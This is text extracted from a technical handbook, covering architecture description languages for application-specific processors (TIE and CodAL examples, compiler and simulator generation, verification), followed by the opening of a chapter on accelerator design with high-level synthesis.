any specific LISA-based capabilities are no longer easy to find in ASIP Designer.
PEAS
PEAS , which went through several generations (PEAS-I, PEAS-II, and PEAS-III)
in the 1990s (Itoh et al. 2000a; Itoh et al. 2000b), was somewhat unique in being an
ASIP approach that emerged from academic work in Japan. It was the basis for a
commercial spin out, ASIP Meister (Hassan and Imai 2005), but this was not very
successful. In addition, although the PEAS developed an ASIP design environment,
it was more of a GUI-based environment that did not share much in the way of ADL
formalisms.
TENSILICA TIE
pipeline (NX). An example TIE description for a 4-way, 16-bit vector integer add
instruction is shown in the following:
regfile simd64 64 16 v//16-entry register file
that is 64 bits wide operation vec4_add16
{out simd64 res, in simd64 A, in simd64 B} { } {
wire [15:0] rtmp1 = A[15: 0] + B[15: 0] ;
wire [15:0] rtmp2 = A[31:16] + B[31:16] ;
wire [15:0] rtmp3 = A[47:32] + B[47:32] ;
wire [15:0] rtmp4 = A[63:48] + B[63:48] ;
assign res = { rtmp4, rtmp3, rtmp2, rtmp1 } ;
}
More detailed descriptions of TIE are available at Sanghavi and Andrews (2008)
and (Bailey and Martin 2010, chapter 6).
The design space exploration flows supported in the Xtensa and TIE toolset
present opportunities for exploiting data-level parallelism, instruction-level paral-
lelism using Xtensa Flexible Length Instruction eXtensions (FLIX, which is similar
to VLIW but with better encoding opportunities since it supports multiple formats),
customizable storage, and increased data bandwidth. For example, to have increased
data bandwidth, processor designers can add multiple I/O interfaces (ports, queues,
lookups) to the Xtensa processor for fixed-latency data transfer. Instructions created
using TIE implicitly initiate one or multiple transactions over these interfaces, which
significantly increases I/O bandwidth. These can also be used to interface to external
dedicated hardware blocks which execute autonomously from the basic Xtensa
pipeline.
ARC APEX
Codasip CodAL
Codasip (Codasip) emerged during the third ADL era (the second industrial era) as
a commercial ASIP provider, with its own proprietary ASIP RISC cores, proprietary
ISA extension ADL CodAL (Codasip Architectural Language) (Přikryl 2020), and
GUI and toolset for defining and building ASIPs. Like many earlier ADLs, it was
based on academic work – in this case, done at the University of Brno, Czechia
(Trmac et al. 2010; Husár et al. 2010).
However, it was not successful with its proprietary approach, so it cleverly did
a pivot in the middle of the era to switch out its proprietary RISC for RISC-V,
which was emerging as a new standard, defining a new family of RISC cores
based on various RISC-V extension bundles, and adapting CodAL to generate
implementations of new instruction extensions to fit into RISC-V architectural
concepts.
In late 2021–early 2022, Codasip also began significant management changes
and expansion of R&D beyond its Brno, Czechia roots. (Press Release 2021). It
is not clear if it will be successful long term as an offering of RISC-V base cores,
which can be extended by users using CodAL, but the pivot was clearly an important
part of corporate survival.
Codasip offers Codasip Studio (https://codasip.com/products/codasip-studio/)
as a GUI and toolset to convert base RISC-V configurations plus CodAL ISA
extensions into a buildable ASIP with software tool support. The following code
example shows a Multiply-Accumulate (MAC) instruction realized using CodAL,
which draws inspiration from ADLs like LISA.
element i_mac {
use reg as dst, src1, src2;
assembly {“mac” dst “,” src1 “,” src2};
binary {OP_MAC dst src1 src2 0:bit[9]};
semantics {rf[dst] += rf[src1] * rf[src2]};
}
822 A. Chattopadhyay et al.
Andes ACE
RISC-V Chisel
combination of conventional configurable RTL design for their basic CPUs and
DSPs, and their own ISA extension ADLs for adding new custom operations, rather
than anything based on Chisel.
ADL-Driven Methodologies
There are five areas of particular interest where ADL methodologies have made
major contributions in both academic research and the commercial domain:
As discussed previously, ADLs are used to specify processor and memory archi-
tectures and have been used to generate software tools including the compiler,
simulator, assembler, profiler, debugger, disassembler, hardware abstraction level
software (HAL), often software stacks and configured low-level software routines,
and libraries tuned to the processor configuration. Figure 2 shows an ADL-based
design space exploration flow. The application programs, usually written in C/C++
or in higher level libraries such as OpenCV, OpenCL, or Halide, are compiled to
the ISA and simulated, and the feedback is used to modify the ADL specification,
to explore the design space, with the goal of finding the best possible architecture
for the given set of application programs under various design constraints such as
performance, power and area (PPA).
Drawn from the three eras of ADL development, there are many detailed
descriptions of software tool generation and associated design space exploration.
These include ISDL (Hadjiyiannis et al. 1997), Valen-C (Inoue et al. 1998),
MIMOLA (Leupers and Marwedel 1998), LISA (Meyr et al. 2008), nML (Freericks
1993), Sim-nML (Rajesh and Moona 1999), EXPRESSION (Halambi et al. 1999),
Synopsys ARC (Synopsys DesignWare ARC), RADL (Siska 1998), Synopsys
ASIP designer based on Target Compiler Technologies (Synopsys ASIP Designer),
Tensilica TIE (Cadence Tensilica), MDES (The MDES User Manual), Codasip
Studio, and ANDES.
Compilers Traditionally, software for embedded systems was hand-tuned in
assembly. However, it is not practical to develop software in assembly language
or to optimize it manually except for critical sections of the code. The use of
intrinsics embedded in C/C++ code can substitute for manual assembly to some
extent and is often as efficient, but in general, high-quality compilers which
produce optimized machine-specific code from a program specified in a high-level
824 A. Chattopadhyay et al.
language (HLL) such as C/C++ and Java are necessary for productivity, time-
budgets, and efficiency, in order to produce efficient software within the time
budget. There has been a lot of work on efficient compilers for embedded systems
(Hohenauer et al. 2006, 2008; Goossens et al. 2006). In particular, given the rise
of ASIPs, new processor ISAs such as RISC-V, application-specific processing in
general, and new compilation approaches such as CLANG/LLVM, the need to make
all good compilers retargetable has come to the fore (Goossens et al. 2006).
Use of ISA extension ADLs to complement a base ISA, as with ARC APEX,
Tensilica TIE, Codasip CodAL, and ANDES ACE, begs the question of where the
new custom instructions will come from.
Skilled designers, using the ADL ASIP tool capabilities and application profiling,
are usually a good source of new custom instructions. However, in the early to
late 2000s, there was considerable interest in automating this process. In (Atasu
et al. 2012; Pothineni et al. 2008; Biswas et al. 2007), the problem was looked
at in a standalone fashion. Custom instruction, as a standalone problem, has been
studied in depth (Atasu et al. 2012; Pothineni et al. 2008; Biswas et al. 2007). For
ISA extension to an existing processor, there have been research work (Leupers
et al. 2006) and work on hardware optimizations (Karuri et al. 2007) and with
reconfigurable targets (Karuri et al. 2008).
Perhaps more interesting are two developments that tried to commercialize this
approach. The Tensilica XPRES tool [(Goodwin and Pekov 2003), Chapter 8 of
reference 2, chapter 6 of reference 84] automatically moved from a single or
multiple application profiling runs to the generation of Tensilica TIE ADL code
extending operations in three ways: SIMD, instruction fusion, and instruction-
level parallelism (FLIX). The automatically generated TIE could be constrained to
land at different points along a performance-area Pareto curve, thereby facilitating
design tradeoffs. Equally interesting, the compiler could automatically make use of
the automatically generated instructions to speed up the code when compiling it,
without manual intervention, thus providing a high level of automation.
Another attempt was based on the work of Pozzi and Ienne [Chapter 7 of
reference 84], which formed the basis of a startup in Lugano, Switzerland, called
Mimosys (Brown and Epalza 2006).
Perhaps the most interesting conclusion from the Tensilica XPRES experience
was that despite generating potentially thousands of lines of ADL code for instruc-
tions that gave significant acceleration for a class of applications, the resulting code
was not really the basis for a commercial product by a design team. It was too
lengthy and complex, was not commented (so the links back to the kernels of the
applications were difficult to discern), and lacked enough generality to be a good
basis for future applications drawn from the domains used to generate the ADL
code.
23 Architecture Description Languages 825
of the internal pipeline and processor state and thus produce cycle-approximate
statistics or, with a very detailed pipeline and state model, cycle-accurate statistics.
There may be some difficulties accurately modeling instruction-level parallelism
and the interaction of external events such as interrupts and exceptions since
fundamentally every operation is executed serially, even if modeled as executing
in parallel. Similarly, modeling the implications of various memory accesses
accurately will require a lot of simulation overhead, thus slowing it down.
As will be seen, there are other approaches that tend to avoid the high overhead
of the interpreted ISS.
Compiled. In a compiled approach, each target instruction is translated into
a series of host machine instructions which emulate the function of each target
instruction and use and modify the simulated processor state.
If the target code is compiled into host code before running the simulator,
the complete processor fetch-decode-dispatch overhead is eliminated (this is static
compiled simulation). Alternative approaches will compile the code dynamically
when it is loaded; in this way, the overhead will be spread over repeated executions.
Compiled ISSs have been the subject of research (Zhu and Gajski 1999;
Pees et al. 2000; Cmelik and Keppel 1994; Witchel and Rosenblum 1996) and
commercial ASIP/ADL providers have also offered them. Synopsys ARC, for
example, offers nSIM, which is based on compiled ISS concepts, to complement
its xCAM Cycle-Accurate ISS model, which is generated by abstracting from the
processor RTL (https://www.synopsys.com/designware-ip/processor-solutions/arc-
development-tools/simulation-tools.html).
Interpreted and Compiled. Because interpreted ISSs are flexible but slow
due to instruction decoding and dispatch modeling, and compiled ISSs impose
a preruntime overhead to generate the static compiled code simulation model,
researchers worked on methods to combine the advantages of both, such as “Just
in Time Compiled Code Simulation (JIT-CCS)” (Nohl et al. 2002) and “Instruction
Set Compiled Simulation (IS-CS)” (Reshadi et al. 2003).
In JIT-CCS, an instruction is compiled during runtime, just before the operation
needs to be executed, and the compiled information is cached so that when the
operation is encountered again in the instruction stream, it does not need to be
recompiled. In IS-CS, instruction decoding is done during compile time, and if
the code is run-time modified, the instruction is re-decoded in subsequent use. To
further reduce the overhead of the compilation process, the ISS framework might
execute an operation a few times in interpreted mode and only compile it once
it has detected that the operation is likely to be executed many times. Thus, very
infrequently executed instructions (or indeed, instructions that may not be executed
at all in a particular simulation run) are only interpreted and not compiled.
These techniques did not remain as only of academic research. Commercial
ASIP/ADL companies adopted these techniques to speed up their ISS simulation.
Tensilica, for example, introduced a “fast functional” simulation mode called
TurboXim (Augustine et al. 2009), which complements its cycle-accurate ISS mode,
and greatly increased functional ISS performance for software developers.
23 Architecture Description Languages 827
Hybrid. Since software developers often do not need high accuracy in simulation
for a complete application run, hybrid simulation offers a capability to use functional
execution to quickly reach an area of interest and then switch to a detailed cycle-
accurate simulation mode to debug or study the detailed performance of a critical
area of code. Researchers developed such techniques (Kraemer et al. 2007) allowing
switching between cycle-accurate modeling and functional mode which uses host-
based emulation.
The main issue with hybrid simulation is keeping the models of the processor
state in the two modes synchronized enough that switching does not introduce gross
inaccuracies. This can be done by restricting where switching is done (e.g., at the
boundaries of a function) or by explicit state flushing and restoration techniques
done just before switching,
The hybrid technique is also available in the commercial ASIP world (see, for
example, Chap. 6 of Bailey and Martin 2010), where it can also be used in a
different mode – statistical sampling between fast functional and cycle-accurate
mode, to allow performance predictions based on cycle-accurate execution to be
generated for the complete application running mostly in fast functional mode. As
with any technique, care must be taken to ensure that the predictions have reasonable
accuracy by ensuring that mode-switching is sufficiently random.
Detailed PPA analysis of generated processors, and integration into an actual SoC,
needs synthesizable RTL. The two types of ADLs discussed earlier: complete ADL
and ISA extension ADLs will do this in somewhat different ways. In the end,
however, much of the PPA of the generated processor depends on the degree to
which the designers take care to optimize the resulting core for their applications.
ISA-Extensible ADL In this approach, followed by most commercial
ASIP/ADL providers (e.g., Tensilica TIE, Synopsys ARC, Andes ACE, Codasip
CodAL), a base core architecture is configured through the selection or de-
selection of many different offered functional units, ISA packages, interfaces
such as memories, pipeline choices, etc., as discussed earlier. Complementing
this configuration is the designer addition of ADL-based ISA extensions, which
as noted can contain considerable extra processor resources (register files, vector
SIMD units, VLIW style slotting of duplicate functional units, etc.). Thus, in this
approach, the base processor once configured may not be extended at all, or may be
modestly extended with a few simple operations, or may be vastly extended with
complete vector SIMD processing units, so that the resulting generated HDL could
be 100% based on the supplier design, or anywhere from a few percent to 90%
or more based on designer ISA extensions. This is the basis of a “configurable,
extensible” processor offering.
As the percentage of customized ISA extensions rises, the difference between
an ISA-extensible ADL and a complete ADL begins to diminish. Nevertheless, as
828 A. Chattopadhyay et al.
will be seen, complete ADL approaches offer yet more flexibility in basic processor
architecture.
Under the hood, a processor supplied ASIP/DSP may actually use its own ISA
extension ADL to generate much of the base processor configured RTL code. The
reason for this being the high-quality RTL code generation from an ADL. In this
scenario, libraries of preoptimized ADL code may be offered as part of the toolset
to give designers a quicker path to efficient RTL and more optimal RTL than the
external designs could achieve on their own. This follows the mantra that “the best
designers of ADL-based processors are often the internal supplier designers.”
Complete ADL Researchers and providers of complete ADL ASIP approaches
have offered more flexibility with this approach than the ISA extension ADL
concepts discussed previously, although, as mentioned, when user-defined ISA
extensions grow to be 90% of the processor, the distinction between the two
approaches is greatly diminished.
Nevertheless, complete ADL approaches offer designers more flexibility in
bottom-up ASIP design, because they do not restrict them to a preimplemented
pipeline and basic processor micro-architecture. Nor do they impose a predefined
base RISC ISA. Tools such as Synopsys ASIP designer (Synopsys ASIP Designer)
offer the designers a chance to completely define the pipeline, interfaces, and ISA
for the generated processor. In many deeply embedded applications (such as hearing
aids or audio processors), this ability to completely tune the resulting PPA of the
generated HDL may be a vital design criterion that outweighs the extra design time
needed to start from scratch.
Commercial providers of complete ADLs try to compensate for the steeper
learning curve when compared to ISA extension ADL approaches by providing
extensive example libraries. These give starting points in source code for users
to learn processor design from the ground up and to develop their own ground-
up designs. Synopsys ASIP designer, for example, provides examples ranging
from simple 16-bit RISC microcontrollers, through 32-bit microcontrollers, RISC-
V CPUs, DSPs from simple through SIMD through VLIW style, and a number of
ASIP designs for video, communications, FFT, JPEG encoding, image processing,
matrix operations, and Simultaneous Localization and Mapping (SLAM) (Synopsys
ASIP Designer).
Top-Down Verification
Property/
Assertion
Property/
Symbolic
Assertion Test Patterns
Simulation
Manually Test Patterns
written Simulator
RTL Match Simulation
Result Simulator
Automatically
Equivalence generated RTL
Automatically
Version 1 Checking generated RTL
Version 2
With ADLs, designers were able to develop executable specifications, either for
the complete processor or for a major portion of it, and this allows a top-down
verification flow to be developed (Mishra 2005; Chattopadhyay et al. 2006c) as
depicted in Fig. 3.
Verification based on ADLs may use two concepts: first, the ADL specification of
the processor is validated for completeness and integrity using a variety of methods,
and second, the ADL specification can be used to drive simulation-based verification
processes.
A validated ADL specification can be used as a golden model for top-down verifica-
tion flows. Such a top-down verification flow has been used in several contexts:
for example, functional test program generation, verification using equivalence
checking, and symbolic simulation.
Test generation for functional simulation-based verification of processors was
demonstrated in the early ADL eras using MIMOLA (Leupers and Marwedel 1998),
EXPRESSION (Mishra and Dutt 2004b), LISA (Chattopadhyay et al. 2006c), and
nML (Synopsys ASIP Designer). With EXPRESSION (Mishra and Dutt 2004b),
a model checking approach was used to automatically generate functional test
programs from the processor specification. This worked by generating a graph
model of the pipelined processor from the ADL and then creating test programs
to cover the behavior of the pipeline. Further work in this vein was reported for
EXPRESSION (Dang et al. 2009) and LISA (Chattopadhyay et al. 2006c).
A slightly different verification approach using equivalence checking to that
presented in the previous section was suggested in (Mishra 2005). Here an ADL-
generated RTL model was compared to a hand-written RTL implementation of
the processor. The approach also generated properties that could be checked with
symbolic simulation.
23 Architecture Description Languages 831
Commercial design flows for ASIPs with ADLs generate many simulation-based
verification artifacts automatically or based on libraries of models supported in
the flow, and these can be useful for user-defined ISA extensions as well (Jani
et al. 2005). However, one can hardly say at this point in 2022 that the verification
problem has been solved, for hardware, software, or combinations thereof, despite
continued attention to the issues by EDA companies and design teams. As with
ADLs in general, academic research in formal verification has focused on new
constraints, such as, security (Watson et al. 2019).
by using symbolic (#define) pattern names and mappings (e.g., select every m-
th. element from an input vector set).
• Many DSPs share many common subsets of operations used for basic vector
operations (adds, subtracts, shifts, multiplies, multiply-accumulates). Addition-
ally, some DSPs need complex datatypes and operations and some do not, while
all of them need real arithmetic. Some DSPs need FIR and FFT operations, and
some do not. By turning the definitions, properties, and implementations (in TIE
ADL) for these subsets into reusable libraries of operations in various classes,
many different types of DSPs could be created from a common option-based
design flow built on top of these libraries. (This is something the RISC-V creators
realized as well of course.)
• New ADL-based module definition capabilities could speed up the definition and
generation of lane-wise SIMD operations by declaring processing for one SIMD
lane and simply replicating it with an ADL construct. This avoided a number of
errors that could occur when the SIMD lanes needed to be manually generated in
the ADL (e.g., due to typos) and made the ADL code much easier to understand.
• Automated capabilities to define the verification requirements for each operation
class and to generate verification tests from these higher-level requirements were
introduced. Although this was done using tools and flows rather than in the ADL
itself, it is easy to see (especially given earlier work) that this would be better
added to the ADL as an additional set of representations or models.
• Finally, some fairly elaborate capabilities for documentation generation (e.g.,
HTML pages for every operation) were created. Many operations share common
templates and developing documentation entirely by hand is inefficient and error-
prone. The productivity increase by using automated flows was large.
The net impact of this kind of superset ADL flow was a further increase in design
and verification productivity – and thus, this would be a good set of directions for
future commercial ADP-based ASIP tools.
Conclusions
and most advances are the outgrowth of commercial entities. This is despite the
fact that radically new processor architectures and design approaches are not well
supported by ADLs. Perhaps academic research into new architectures will trigger
new academic research into ADLs, especially in hot domains such as Machine
Learning.
In future, the lessons learnt from the ADL evolution can prove to be beneficial for
adopting new high-level synthesis technology trends. Considering the emergence of
Machine Learning (ML) accelerators across various domains right now, it is only
natural to think of whether there are effective design automation methodologies
in place for automating the design of ML accelerators and what kind of parallels
can be drawn from the ADL research. The development of ADL-based design
flows coincided with the growth of wireless signal processing algorithms, which
differ in many requirements compared to ML tasks, most prominently due to
the aspect of data-driven computing of ML. Therefore, for such tasks that put
emphasis on prudent memory bandwidth management and demand extreme forms
of parallelism, newer forms of architecture and corresponding ADL-based tool flows
can be definitely imagined.
The overview started with Makimoto’s wave and the cycles of standardization
and customization. Since domain-specific computing is one of the few techniques
available to increase performance beyond the sputtering out of Moore’s Law and
Dennard scaling, it is entirely possible that domain-specific computing, with ADLs
forming the important backbone, will break the wave and keep the industry in
the customization cycle for a long time to come. The prediction of Chris Rowen,
founder of Tensilica, that “the processor is the NAND gate of the future” (Gries and
Keutzer 2005) may turn out to be the actual future, in no small part due to ADLs.
References
Amor HB, Bernier C, Prikryl Z (2021) A RISC-V ISA extension for ultra-low power IoT wireless
signal processing. In: IEEE transactions on computers. Institute of Electrical and Electronics
Engineers, pp 1–1. https://doi.org/10.1109/TC.2021.3063027.cea-03158876
Andes Custom Extension. http://www.andestech.com/en/productssolutions/andes-custom-
extension/
Atasu K, Luk W, Mencer O, Ozturan C, Dundar G (2012) FISH: fast instruction synthesis for
custom processors. IEEE Trans Very Large Scale Integr Syst 20(1):52–65
Augustine S, Gauthier M, Leibson S, Macliesh P, Martin G, Maydan D, Nedeljkovic N, Wilson
B (2009) Chapter 7 Generation and use of an ASIP software tool chain. In: Wolfgang E,
Wolfgang M, Rainer D (eds) Hardware-dependent software: principles and practice. Springer,
Berlin/Heidelberg, Germany
Bailey B, Martin G (2010) ESL models and their application. Springer
Biswas P, Dutt ND, Pozzi L, Ienne P (2007) Introduction of architecturally visible storage in
instruction set extensions. Comp Aided Design Integrated Circuits Syst IEEE Trans 26(3):435–
446
Bit A (2020) 64-bit custom Math ISA in configurable 32-Bit RISC processor. In ICDSMLA 2019.
Springer, Singapore, pp 564–575
Bo W, Willems M (2015) Rapid architectural exploration in designing application-specific
processors. White Paper, Synopsys. https://www.synopsys.com/dw/doc.php/wp/architectural_-
exploration_designing_application_specific_processors.pdf
23 Architecture Description Languages 835
V. Grimblatt, G. Ferré, F. Rivet, C. Jego and N. Vergara, “Precision agriculture for small to medium
size farmers – an IoT approach,” 2019 IEEE Int Symp Circuits Syst (ISCAS), 2019, pp. 1–5,
https://doi.org/10.1109/ISCAS.2019.8702563
Gupta A, Pal A (2015) Accelerating SVM on ultra low power ASIP for high throughput streaming
applications. In: 2015 28th international conference on VLSI design. IEEE
Hadjiyiannis G, Hanono S, Devadas S (1997) ISDL: an instruction set description language for
retargetability. In Proceedings of the 34th annual design automation conference, DAC ‘97, pp
299–302
Halambi A, Grun P, Ganesh V, Khare A, Dutt N, Nicolau A. EXPRESSION: a language for
architecture exploration through compiler/simulator retargetability. In Design, automation and
test in Europe conference and exhibition 1999. Proceedings, pp 485–490, March 1999
Hartoog MR, Rowson JA, Reddy PD, Desai S, Dunlop DD, Harcourt EA, Khullar N (1997)
Generation of software tools from processor descriptions for hardware/software codesign. In
Proceedings of the 34th annual design automation conference, DAC ‘97, pp 303–306
Hassan MA, Imai M ASIP Meister: an ASIP design environment. DATE 2005 Univer-
sity Booth, https://www.edacentrum.de/system/files/files/veranstaltungen/2005/date05/ubooth/
descriptions/Description_sw_ASIP.pdf
Hohenauer M, Scharwaechter H, Karuri K, Wahlen O, Kogel T, Leupers R, Ascheid G, Meyr H,
Braun G, van Someren H (2004) A methodology and tool suite for C compiler generation from
ADL processor models. In Proceedings of the conference on design, automation and test in
Europe – Volume 2, DATE ‘04, 2004
Hohenauer M, Schumacher C, Leupers R, Ascheid G, Meyr H, Someren Hv (2006) Retargetable
code optimization with SIMD instructions. In CODES+ISSS ‘06: Proceedings of the 4th
international conference on hardware/software codesign and system synthesis. ACM, New
York, pp 148–153
Hohenauer M, Engel F, Leupers R, Ascheid G, Meyr H, Bette G, Singh B (2008) Retargetable code
optimization for predicated execution. In Proceedings of the conference on design, automation
and test in Europe, DATE ‘08, pp 1492–1497
Husár A, Trmac M, Hranac J, Hruska T, Masarík K (2010) Automatic C compiler generation from
architecture description language ISAC. MEMICS:47–53
Inoue A, Tomiyama H, Fajar E, Yasuura NH, Kanbara H (1998) A programming language for
processor based embedded systems. In Proc. of APCHDL, pp 89–94
Itoh M, Higaki S, Sato J, Shiomi A, Takeuchi Y, Kitajima A, Imai M (2000a) PEAS-III: an ASIP
design environment. In Computer design, 2000. Proceedings. 2000 international conference on,
pp 430–436
Itoh M, Takeuchi Y, Imai M, Shiomi A. Synthesizable HDL generation for pipelined processors
from a micro-operation description. IEICE Trans. Fundamentals, March 2000b
Jamma D et al (2016) Design exploration of ASIP architectures for the K-nearest neighbor
machine-learning algorithm. In: 2016 28th international conference on microelectronics (ICM).
IEEE
Jani D, Benson C, Dixit A, Martin G (2005) Chapter 18 Functional verification of configurable
embedded processors. In: Bailey B (ed) The functional verification of electronic systems: an
overview from various points of view. IEC Press, Chicago, US
Kalluri SS. Securing offload engines for A robust secure SoC system. https://semiengineering.com/
securing-offload-engines-for-a-robust-secure-soc-system/
Kammler D, Zhang D, Schwabe P, Scharwaechter H, Langenberg M, Auras D, Ascheid G, Mathar
R (2009) Designing an asip for cryptographic pairings over barreto-naehrig curves. In: Clavier
C, Gaj K (eds) Cryptographic hardware and embedded systems – CHES 2009. Springer, Berlin,
Heidelberg, pp 254–271
Karuri K, Chattopadhyay A, Hohenauer M, Leupers R, Ascheid G, Meyr H (2007) Increasing data-
bandwidth to instruction-set extensions through register clustering. In IEEE/ACM international
conference on computer-aided design (ICCAD)
Karuri K, Chattopadhyay A, Chen X, Kammler D, Hao L, Leupers R, Meyr H, Ascheid G
(2008) A design flow for architecture exploration and implementation of partially reconfigurable
processors. IEEE Trans Very Large Scale Integr Syst 16(10):1281–1294
23 Architecture Description Languages 837
Khare A, Savoiu N, Halambi A, Grun P, Dutt N, Nicolau A (1999) V-SAT: a visual specification and
analysis tool for system-on-chip exploration. In EUROMICRO conference, 1999. Proceedings.
25th, vol 1, pp 196–203
Kraemer S, Gao L, Weinstock J, Leupers R, Ascheid G, Meyr H (2007) HySim: a fast simulation
framework for embedded software development. In: CODES+ISSS ‘07: proceedings of the 5th
IEEE/ACM international conference on hardware/software codesign and system synthesis, pp
75–80
Lanneer D, Praet J, Kifli A, Schoofs K, Geurts W, Thoen F, Goossens G (1995) CHESS:
retargetable code generation for embedded DSP processors. Code Generation for Embedded
Processors, pp 85–102
Leupers R, Marwedel P (1998) Retargetable code generation based on structural processor
description. Des Autom Embed Syst 3(1):75–108
Leupers R, Karuri K, Kraemer S, Pandey M (2006) A design flow for configurable embedded
processors based on optimized instruction set extension synthesis. In: DATE ‘06: proceedings
of the conference on design, automation and test in Europe. European Design and Automation
Association, pp 581–586
Leupers R Chattopadhyay A, Dutt N, Mishra P (2016) Processor modeling and design tools.
Chapter 9 of EDA for IC system design, verification and testing (Volume 1 of the Electronic
Design Automation for Integrated Circuits Handbook, Second Edition), edited by L. Lavagno,
I. Markov, G. Martin, and L. Scheffer, CRC Press/Taylor and Francis
Machetti S (2018) ASIP design for motion estimation in video compression algorithms. PhD
Thesis. Politecnico di Torino
Makimoto T (2002) The hot decade of field programmable technologies. IEEE international
conference on field-programmable technology, 2002. (FPT). Proceedings, pp 3–6. https://doi.
org/10.1109/FPT.2002.1188657
Martin G, Nicolaescu D (2018) Enhancing DSP design productivity with automated generators.
unpublished paper, 2018. (Available by emailing )
Marwedel P (1979) The MIMOLA design system: detailed description of the software system.
16th Design Automation Conference, pp 59–63. https://doi.org/10.1109/DAC.1979.1600089
Maydan D (2011) Evolving voice and audio requirements for smartphones. Linley Technology
Mobile Conference
Meyr H, Chattopadhyay A, Leupers R (2008) LISA: a uniform ADL for embedded processor mod-
elling, implementation and software toolsuite generation. In: Processor description languages,
edited by P. Mishra and N. Dutt, pp 95–130
Mishra P (2005) Processor validation: a top-down approach. Potentials, IEEE 24(1):29–33
Mishra P, Dutt N (2004a) Modeling and validation of pipeline specifications. ACM Trans Embed
Comput Syst 3(1):114–139
Mishra P, Dutt N (2004b) Graph-based functional test program generation for pipelined processors.
In Design, automation and test in Europe conference and exhibition, 2004. Proceedings, vol 1,
pp 182–187
Mishra P, Dutt N (2005a) Functional coverage driven test generation for validation of pipelined
processors. In Proceedings of the conference on design, automation and test in Europe - Volume
2, DATE ‘05, pp 678–683
Mishra P, Dutt N (2005b) Architecture description languages for programmable embedded
systems. In: IEE Proceedings on computers and digital techniques
Mishra P, Dutt N (eds) (2008) Processor description languages. Morgan Kaufmann Publishers Inc
Mishra P, Dutt N, Tomiyama H (2003) Towards automatic validation of dynamic behavior in
pipelined processor specifications. Des Autom Embed Syst 8(2–3):249–265
Mishra P, Kejariwal A, Dutt N (2004) Synthesis-driven exploration of pipelined embedded
processors. In VLSI design, 2004. Proceedings of the 17th international conference on, pp 921–
926
Nohl A, Braun G, Schliebusch O, Leupers R, Meyr H, Hoffmann A (2002) A universal technique
for fast and flexible instruction-set architecture simulation. In Proceedings of the 39th annual
design automation conference, DAC ‘02, pp 22–27
838 A. Chattopadhyay et al.
Contents
Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 842
Background: Technology and Models . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 844
Target Technology . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 844
Accelerator Models . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 846
Accelerator Template . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 847
Introduction to High-Level Synthesis . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 848
A Traditional High-Level Synthesis Framework . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 848
A Bit of History on Commercial Products and Academic Projects . . . . . . . . . . . . . . . . . . . 850
From Input Specification to Intermediate Representation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 851
Input Specification and Intermediate Representation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 851
Analysis and Optimization of the Intermediate Representation . . . . . . . . . . . . . . . . . . . . . . 853
Creation of the Microarchitecture . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 855
Scheduling and Performance Optimization . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 855
Binding and Resource Optimization . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 857
Definition of the Memory Architecture . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 859
Creation of the FSM Controller . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 863
RTL Generation and System Integration . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 863
Code Generation, Evaluation, and Verification . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 863
System-Level Integration and Optimization . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 864
Open and Modern Challenges . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 865
Creation of Domain-Specific Architectures . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 865
Programmability and System-Level Optimization . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 867
Hardware Security and Data Protection . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 868
Conclusion . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 868
References . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 869
Abstract
Keywords
Introduction
Controller to off-
ACC ACC MEM chip memory
NI NI NI
Pre-existing software
processors
CPU ACC ACC
NI NI NI Specialized accelerator
generated with HLS
Communication I/O ACC ACC
infrastructure NI NI NI
Fig. 1 Example of heterogeneous platform: CPUs and auxiliary elements are predesigned com-
ponents, while accelerators can be designed with HLS. The FPGA can host the entire system or
only some accelerators
844 C. Pilato and S. Soldavini
Target Technology
When selecting the processing elements for an architecture, designers have to face
the never-ending challenge of trading off performance and flexibility, as shown in
Fig. 2. While performance is the main optimization goal for many applications,
flexibility allows them to reuse the same system for different applications. The
traditional central processing unit (CPU) is the most flexible component, able to
execute any kind of application, sacrificing performance and energy efficiency. A
specialized processor, like a digital signal processor (DSP), a graphics processing
unit (GPU), or a tensor processing unit (TPU), offers better performance for
application-specific workloads (e.g., audio, video, or machine-learning applications)
while maintaining a certain degree of flexibility.
A field-programmable gate array (FPGA) device is an array of elements
that can be configured by the user to execute a specific functionality even after
fabrication, as shown in Fig. 3. For this reason, the elements are called configurable
24 Accelerator Design with High-Level Synthesis 845
FPGA
Domain-specific
TPU architectures
GPU
DSP
CPU
Flexibility
